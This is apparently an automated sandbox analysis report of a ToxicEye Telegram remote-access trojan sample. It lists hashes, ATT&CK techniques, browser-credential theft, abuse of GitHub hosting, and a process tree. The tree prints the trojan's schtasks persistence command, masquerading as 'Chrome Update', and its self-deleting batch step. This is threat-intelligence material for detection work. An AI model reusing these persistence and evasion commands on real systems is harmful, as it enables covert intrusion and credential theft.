toxiceye | 6e644b385d296b76bb3ba68ff006d6b86de763c8b5792e07053e20e3d8218d75

Analysis

max time kernel
281s
max time network
379s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/01/2025, 11:15 UTC

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

TelegramRAT.exe
Size

111KB
MD5

e3d580a17a351366392ec9e2af674524
SHA1

354e8f441c2fa510e1b3ecab222280649a7efb9a
SHA256

6e644b385d296b76bb3ba68ff006d6b86de763c8b5792e07053e20e3d8218d75
SHA512

a7e2726a2b28a39f6624f419ab9194b4c8e3d4c117e324c2719b3f944c5262cbc064df8989d34b984d8541767327d18381adf6678e4445dc8a49afe0a0824309
SSDEEP

1536:dn+bAQACiEXM91qQIwvL9x1Cc0Di4OybhDqI64QW6zCrAZuQPEDrL:sbaCHXELrJp6bxqH4QW6zCrAZuQwv

Score

10^/10

toxiceye discovery evasion rat spyware stealer trojan

Malware Config

Signatures

ToxicEye
ToxicEye is a trojan written in C#.
rat trojan toxiceye
Toxiceye family
toxiceye
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	TelegramRAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	rat.exe

Executes dropped EXE 1 IoCs

pid	Process
1576	rat.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
134	raw.githubusercontent.com
135	raw.githubusercontent.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
936	tasklist.exe

Drops file in Windows directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
748	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133811543468671996"	chrome.exe

Modifies registry class 23 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	calc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3164	schtasks.exe
3476	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1576	rat.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
408	msedge.exe
408	msedge.exe
3720	msedge.exe
3720	msedge.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe
1576	rat.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1576	rat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4464	TelegramRAT.exe
Token: SeDebugPrivilege	936	tasklist.exe
Token: SeDebugPrivilege	1576	rat.exe
Token: SeDebugPrivilege	1576	rat.exe
Token: 33	4652	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4652	AUDIODG.EXE
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe
Token: SeShutdownPrivilege	740	chrome.exe
Token: SeCreatePagefilePrivilege	740	chrome.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
3720	msedge.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe
740	chrome.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
1576	rat.exe
4664	mspaint.exe
3520	mspaint.exe
4328	mspaint.exe
4664	mspaint.exe
3520	mspaint.exe
4664	mspaint.exe
4664	mspaint.exe
3520	mspaint.exe
3520	mspaint.exe
4328	mspaint.exe
4328	mspaint.exe
4328	mspaint.exe
2348	mspaint.exe
2348	mspaint.exe
2348	mspaint.exe
2348	mspaint.exe
1356	mspaint.exe
4408	mspaint.exe
1356	mspaint.exe
1356	mspaint.exe
1356	mspaint.exe
4408	mspaint.exe
4408	mspaint.exe
4408	mspaint.exe
4720	mspaint.exe
2660	OpenWith.exe
5212	mspaint.exe
4720	mspaint.exe
4720	mspaint.exe
4720	mspaint.exe
5212	mspaint.exe
5212	mspaint.exe
5212	mspaint.exe
5492	mspaint.exe
5652	mspaint.exe
4168	OpenWith.exe
5716	mspaint.exe
5492	mspaint.exe
5492	mspaint.exe
5492	mspaint.exe
2384	OpenWith.exe
5652	mspaint.exe
5652	mspaint.exe
5652	mspaint.exe
5716	mspaint.exe
5716	mspaint.exe
5716	mspaint.exe
1476	mspaint.exe
5236	OpenWith.exe
400	mspaint.exe
1476	mspaint.exe
1476	mspaint.exe
1476	mspaint.exe
400	mspaint.exe
400	mspaint.exe
400	mspaint.exe
5476	OpenWith.exe
6320	mspaint.exe
4372	OpenWith.exe
6320	mspaint.exe
6320	mspaint.exe
6320	mspaint.exe
5468	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 3476	4464	TelegramRAT.exe	85
PID 4464 wrote to memory of 3476	4464	TelegramRAT.exe	85
PID 4464 wrote to memory of 392	4464	TelegramRAT.exe	87
PID 4464 wrote to memory of 392	4464	TelegramRAT.exe	87
PID 392 wrote to memory of 936	392	cmd.exe	89
PID 392 wrote to memory of 936	392	cmd.exe	89
PID 392 wrote to memory of 4824	392	cmd.exe	90
PID 392 wrote to memory of 4824	392	cmd.exe	90
PID 392 wrote to memory of 748	392	cmd.exe	91
PID 392 wrote to memory of 748	392	cmd.exe	91
PID 392 wrote to memory of 1576	392	cmd.exe	92
PID 392 wrote to memory of 1576	392	cmd.exe	92
PID 1576 wrote to memory of 3164	1576	rat.exe	94
PID 1576 wrote to memory of 3164	1576	rat.exe	94
PID 1576 wrote to memory of 3720	1576	rat.exe	112
PID 1576 wrote to memory of 3720	1576	rat.exe	112
PID 3720 wrote to memory of 2812	3720	msedge.exe	113
PID 3720 wrote to memory of 2812	3720	msedge.exe	113
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 2188	3720	msedge.exe	114
PID 3720 wrote to memory of 408	3720	msedge.exe	115
PID 3720 wrote to memory of 408	3720	msedge.exe	115
PID 3720 wrote to memory of 2128	3720	msedge.exe	116
PID 3720 wrote to memory of 2128	3720	msedge.exe	116
PID 3720 wrote to memory of 2128	3720	msedge.exe	116
PID 3720 wrote to memory of 2128	3720	msedge.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe
"C:\Users\Admin\AppData\Local\Temp\TelegramRAT.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3476
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp81D2.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp81D2.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:392
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 4464"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:936
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:4824
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:748
- - C:\Users\ToxicEye\rat.exe
    "rat.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1576
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Chrome Update" /tr "C:\Users\ToxicEye\rat.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3164
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:3720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd2fa646f8,0x7ffd2fa64708,0x7ffd2fa64718
        5⤵
        
        PID:2812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        5⤵
        
        PID:2188
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
        5⤵
        
        PID:2128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
        5⤵
        
        PID:3116
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
        5⤵
        
        PID:2420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
        5⤵
        
        PID:1676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
        5⤵
        
        PID:4288
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5260 /prefetch:8
        5⤵
        
        PID:2656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2136,12467533972426679037,3032924218876524045,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5380 /prefetch:8
        5⤵
        
        PID:1220
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:3928
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:464
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:1892
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:4664
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4568
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:3520
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      Modifies registry class
      PID:1008
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:4176
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:4328
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:4868
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
      4⤵
      PID:3148
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:3096
  - - C:\Windows\System32\calc.exe
      "C:\Windows\System32\calc.exe"
      4⤵
      Modifies registry class
      PID:5112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe"
      4⤵
      PID:4972
  - - C:\Windows\System32\mspaint.exe
      "C:\Windows\System32\mspaint.exe"
      4⤵
      Drops file in Windows directory
      Suspicious use of SetWindowsHookEx
      PID:2348
  - - C:\Windows\System32\notepad.exe
      "C:\Windows\System32\notepad.exe"
